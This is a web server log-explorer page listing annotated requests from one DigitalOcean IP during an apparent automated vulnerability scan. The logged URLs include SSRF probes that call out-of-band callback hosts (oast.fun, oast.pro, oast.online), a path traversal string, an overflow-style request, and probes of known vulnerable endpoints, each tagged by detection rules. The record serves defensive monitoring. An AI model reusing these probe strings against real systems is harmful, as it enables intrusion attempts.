Log Explorer

Fact drill-down for 68.183.143.133

Risk 12 LOW Scope All time All-time facts 240 In-scope 240 Filtered 240 Seen 2025-03-10 → 2025-03-10

Reset (all-time)

Active (none) Clear

Faceted filters (facts-based) exact core + snapshot + optional start/end

Annotation facets

HTTP facets

Snapshot facets

Custom time window (optional override)

Provide start/end to scope time explicitly (overrides days). Leave blank for all-time.

Tip: keep windows tight when you need speed, but the default is fact-complete.

Top annotators (facts, in-scope)

base 141 scan_velocity 38 ref 28 cred 18 sfp 8 trav 5 ua 2

Top labels (facts, in-scope)

observed 141 scan_velocity 38 ref 28 cred 18 sensitive_file 8 trav 5 ua 2

Click a pill to apply it as a filter.

Annotated access events

Showing page 1 / 5 — total 240 rows

← Prev Next →

#1 2025-03-10 00:50:05 event 3081495 POST 404 bytes 7897

ann base label observed

Request event observed

/wms

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/wms

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15

summary

event observed

details

—

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#2 2025-03-10 00:50:05 event 3081494 POST 404 bytes 7903

ann base label observed

Request event observed

/geoserver/wms

referer

Mozilla/5.0 (X11; CrOS x86_64 14816.131.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/geoserver/wms

referer

Mozilla/5.0 (X11; CrOS x86_64 14816.131.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36

summary

event observed

details

—

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#3 2025-03-10 00:48:39 event 3081452 POST 404 bytes 7901

ann base label observed

Request event observed

/servlets/OmaDsServlet

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/servlets/OmaDsServlet

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0

summary

event observed

details

—

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#4 2025-03-10 00:46:57 event 3081435 GET 400 bytes 163

ann base label observed

Request event observed

/?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA…

referer

Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

referer

Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

summary

event observed

details

—

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#5 2025-03-10 00:44:23 event 3081405 POST 404 bytes 7899

ann base label observed

Request event observed

/api/v4/ci/lint?include_merged_yaml=true

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 12_1_4; en-US) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/api/v4/ci/lint?include_merged_yaml=true

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 12_1_4; en-US) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15

summary

event observed

details

—

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#6 2025-03-10 00:44:20 event 3081404 POST 403 bytes 974

ann base label observed

Request event observed

referer

Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

referer

Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36

summary

event observed

details

—

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#7 2025-03-10 00:44:16 event 3081402 GET 404 bytes 7901

ann trav 26 label trav

Request Path traversal / LFI indicator detected

/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:70.0) Gecko/20100101 Firefox/70.0

Annotation facts

label

trav

rule

trav:mixed_separators

conf

90.00

details

Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.

More (full fields + snapshot) expand

url

/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:70.0) Gecko/20100101 Firefox/70.0

summary

Path traversal / LFI indicator detected

details

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#8 2025-03-10 00:44:16 event 3081402 GET 404 bytes 7901

ann trav 28 label trav

Request Path traversal / LFI indicator detected

/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:70.0) Gecko/20100101 Firefox/70.0

Annotation facts

label

trav

rule

trav:dotdot_slash

conf

92.00

details

More (full fields + snapshot) expand

url

/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:70.0) Gecko/20100101 Firefox/70.0

summary

Path traversal / LFI indicator detected

details

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#9 2025-03-10 00:44:16 event 3081402 GET 404 bytes 7901

ann sfp 34 label sensitive_file

Request Directory traversal indicator

/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:70.0) Gecko/20100101 Firefox/70.0

Annotation facts

label

sensitive_file

rule

sfp:traversal

conf

86.00

details

Traversal sequences were present (raw or encoded). Snippet='action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4'

More (full fields + snapshot) expand

url

/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:70.0) Gecko/20100101 Firefox/70.0

summary

Directory traversal indicator

details

Traversal sequences were present (raw or encoded). Snippet='action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4'

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#10 2025-03-10 00:44:16 event 3081402 GET 404 bytes 7901

ann ref 8 label ref

Request Multiple redirect parameters observed in one request

/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:70.0) Gecko/20100101 Firefox/70.0

Annotation facts

label

ref

rule

ref:multi_redirect_chain

conf

80.00

details

Chaining multiple redirect parameters is common in affiliate/phishing plumbing and in open-redirect exploitation attempts.

More (full fields + snapshot) expand

url

/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:70.0) Gecko/20100101 Firefox/70.0

summary

Multiple redirect parameters observed in one request

details

Chaining multiple redirect parameters is common in affiliate/phishing plumbing and in open-redirect exploitation attempts.

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#11 2025-03-10 00:44:16 event 3081402 GET 404 bytes 7901

ann ref 9 label ref

Request Open-redirect style parameter points to an external URL

/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:70.0) Gecko/20100101 Firefox/70.0

Annotation facts

label

ref

rule

ref:open_redirect_param

conf

85.00

details

A redirect-capable query parameter contains an absolute (external) URL. This is commonly used in phishing chains and open-redirect probing.

More (full fields + snapshot) expand

url

/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:70.0) Gecko/20100101 Firefox/70.0

summary

Open-redirect style parameter points to an external URL

details

A redirect-capable query parameter contains an absolute (external) URL. This is commonly used in phishing chains and open-redirect probing.

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#12 2025-03-10 00:44:16 event 3081403 POST 404 bytes 7898

ann base label observed

Request event observed

/dana-ws/saml20.ws

referer

Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/dana-ws/saml20.ws

referer

Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36

summary

event observed

details

—

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#13 2025-03-10 00:44:16 event 3081402 GET 404 bytes 7901

ann base label observed

Request event observed

/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:70.0) Gecko/20100101 Firefox/70.0

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:70.0) Gecko/20100101 Firefox/70.0

summary

event observed

details

—

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#14 2025-03-10 00:44:16 event 3081401 POST 404 bytes 7897

ann base label observed

Request event observed

/xmlrpc/pingback

referer

Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/xmlrpc/pingback

referer

Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36

summary

event observed

details

—

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#15 2025-03-10 00:44:15 event 3081400 POST 404 bytes 7900

ann base label observed

Request event observed

/client

referer

Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/client

referer

Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0

summary

event observed

details

—

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#16 2025-03-10 00:44:13 event 3081397 GET 404 bytes 7898

ann ref 9 label ref

Request Open-redirect style parameter points to an external URL

/shindig/gadgets/proxy?container=default&url=http://oast.pro

referer

Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36

Annotation facts

label

ref

rule

ref:open_redirect_param

conf

85.00

details

A redirect-capable query parameter contains an absolute (external) URL. This is commonly used in phishing chains and open-redirect probing.

More (full fields + snapshot) expand

url

/shindig/gadgets/proxy?container=default&url=http://oast.pro

referer

Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36

summary

Open-redirect style parameter points to an external URL

details

A redirect-capable query parameter contains an absolute (external) URL. This is commonly used in phishing chains and open-redirect probing.

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#17 2025-03-10 00:44:13 event 3081399 POST 404 bytes 7900

ann base label observed

Request event observed

/connect/register

referer

Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/connect/register

referer

Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36

summary

event observed

details

—

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#18 2025-03-10 00:44:13 event 3081398 GET 404 bytes 7899

ann base label observed

Request event observed

/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey&txtSearchfor&selfor=Business+location&btnSubmit=Search&operator=http://cv70744c1utej8crv3ggf…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey&txtSearchfor&selfor=Business+location&btnSubmit=Search&operator=http://cv70744c1utej8crv3ggfmhbn1azcgzso.oast.online

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36

summary

event observed

details

—

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#19 2025-03-10 00:44:13 event 3081397 GET 404 bytes 7898

ann base label observed

Request event observed

/shindig/gadgets/proxy?container=default&url=http://oast.pro

referer

Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/shindig/gadgets/proxy?container=default&url=http://oast.pro

referer

Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36

summary

event observed

details

—

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#20 2025-03-10 00:44:12 event 3081395 GET 404 bytes 7898

ann scan_velocity 36 label scan_velocity

Request Scan-velocity indicator: scanv:rpm

/ui/vropspluginui/rest/services/getvcdetails

referer

Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36

Annotation facts

label

scan_velocity

rule

scanv:rpm

conf

90.00

details

rpm_equiv=84.7; score=18; window=90s; total=127; rpm_equiv=84.7; upm_nonstatic_equiv=42.7; 404=99/127(0.78); ext_hits=16; ua_sig=0; methods=['GET', 'POST', 'PUT']

More (full fields + snapshot) expand

url

/ui/vropspluginui/rest/services/getvcdetails

referer

Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36

summary

Scan-velocity indicator: scanv:rpm

details

rpm_equiv=84.7; score=18; window=90s; total=127; rpm_equiv=84.7; upm_nonstatic_equiv=42.7; 404=99/127(0.78); ext_hits=16; ua_sig=0; methods=['GET', 'POST', 'PUT']

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#21 2025-03-10 00:44:12 event 3081395 GET 404 bytes 7898

ann scan_velocity 36 label scan_velocity

Request Scan-velocity indicator: scanv:method_enum

/ui/vropspluginui/rest/services/getvcdetails

referer

Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36

Annotation facts

label

scan_velocity

rule

scanv:method_enum

conf

90.00

details

non_safe_methods=['POST', 'PUT']; score=18; window=90s; total=127; rpm_equiv=84.7; upm_nonstatic_equiv=42.7; 404=99/127(0.78); ext_hits=16; ua_sig=0; methods=['GET', 'POST', 'PUT']

More (full fields + snapshot) expand

url

/ui/vropspluginui/rest/services/getvcdetails

referer

Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36

summary

Scan-velocity indicator: scanv:method_enum

details

non_safe_methods=['POST', 'PUT']; score=18; window=90s; total=127; rpm_equiv=84.7; upm_nonstatic_equiv=42.7; 404=99/127(0.78); ext_hits=16; ua_sig=0; methods=['GET', 'POST', 'PUT']

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#22 2025-03-10 00:44:12 event 3081395 GET 404 bytes 7898

ann scan_velocity 36 label scan_velocity

Request Scan-velocity indicator: scanv:404_ratio

/ui/vropspluginui/rest/services/getvcdetails

referer

Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36

Annotation facts

label

scan_velocity

rule

scanv:404_ratio

conf

90.00

details

404=99/127(0.78); score=18; window=90s; total=127; rpm_equiv=84.7; upm_nonstatic_equiv=42.7; 404=99/127(0.78); ext_hits=16; ua_sig=0; methods=['GET', 'POST', 'PUT']

More (full fields + snapshot) expand

url

/ui/vropspluginui/rest/services/getvcdetails

referer

Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36

summary

Scan-velocity indicator: scanv:404_ratio

details

404=99/127(0.78); score=18; window=90s; total=127; rpm_equiv=84.7; upm_nonstatic_equiv=42.7; 404=99/127(0.78); ext_hits=16; ua_sig=0; methods=['GET', 'POST', 'PUT']

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#23 2025-03-10 00:44:12 event 3081395 GET 404 bytes 7898

ann scan_velocity 36 label scan_velocity

Request Scan-velocity indicator: scanv:ext_enum

/ui/vropspluginui/rest/services/getvcdetails

referer

Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36

Annotation facts

label

scan_velocity

rule

scanv:ext_enum

conf

90.00

details

ext_hits=16; score=18; window=90s; total=127; rpm_equiv=84.7; upm_nonstatic_equiv=42.7; 404=99/127(0.78); ext_hits=16; ua_sig=0; methods=['GET', 'POST', 'PUT']

More (full fields + snapshot) expand

url

/ui/vropspluginui/rest/services/getvcdetails

referer

Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36

summary

Scan-velocity indicator: scanv:ext_enum

details

ext_hits=16; score=18; window=90s; total=127; rpm_equiv=84.7; upm_nonstatic_equiv=42.7; 404=99/127(0.78); ext_hits=16; ua_sig=0; methods=['GET', 'POST', 'PUT']

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#24 2025-03-10 00:44:12 event 3081395 GET 404 bytes 7898

ann scan_velocity label scan_velocity

Request Scan-velocity window summary

/ui/vropspluginui/rest/services/getvcdetails

referer

Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36

Annotation facts

label

scan_velocity

rule

scanv:window

conf

—

details

window=90s; total=127; rpm_equiv=84.7; upm_nonstatic_equiv=42.7; 404=99/127(0.78); ext_hits=16; ua_sig=0; methods=['GET', 'POST', 'PUT']

More (full fields + snapshot) expand

url

/ui/vropspluginui/rest/services/getvcdetails

referer

Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36

summary

Scan-velocity window summary

details

window=90s; total=127; rpm_equiv=84.7; upm_nonstatic_equiv=42.7; 404=99/127(0.78); ext_hits=16; ua_sig=0; methods=['GET', 'POST', 'PUT']

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#25 2025-03-10 00:44:12 event 3081394 GET 404 bytes 7898

ann ref 9 label ref

Request Open-redirect style parameter points to an external URL

/Umbraco/feedproxy.aspx?url=http://cv70744c1utej8crv3ggmrqpdkcd8b5us.oast.online

referer

Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36

Annotation facts

label

ref

rule

ref:open_redirect_param

conf

85.00

details

A redirect-capable query parameter contains an absolute (external) URL. This is commonly used in phishing chains and open-redirect probing.

More (full fields + snapshot) expand

url

/Umbraco/feedproxy.aspx?url=http://cv70744c1utej8crv3ggmrqpdkcd8b5us.oast.online

referer

Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36

summary

Open-redirect style parameter points to an external URL

details

A redirect-capable query parameter contains an absolute (external) URL. This is commonly used in phishing chains and open-redirect probing.

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#26 2025-03-10 00:44:12 event 3081396 POST 404 bytes 7897

ann base label observed

Request event observed

/chat/completions

referer

Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/chat/completions

referer

Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0

summary

event observed

details

—

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#27 2025-03-10 00:44:12 event 3081395 GET 404 bytes 7898

ann base label observed

Request event observed

/ui/vropspluginui/rest/services/getvcdetails

referer

Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/ui/vropspluginui/rest/services/getvcdetails

referer

Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36

summary

event observed

details

—

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#28 2025-03-10 00:44:12 event 3081394 GET 404 bytes 7898

ann base label observed

Request event observed

/Umbraco/feedproxy.aspx?url=http://cv70744c1utej8crv3ggmrqpdkcd8b5us.oast.online

referer

Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/Umbraco/feedproxy.aspx?url=http://cv70744c1utej8crv3ggmrqpdkcd8b5us.oast.online

referer

Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36

summary

event observed

details

—

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

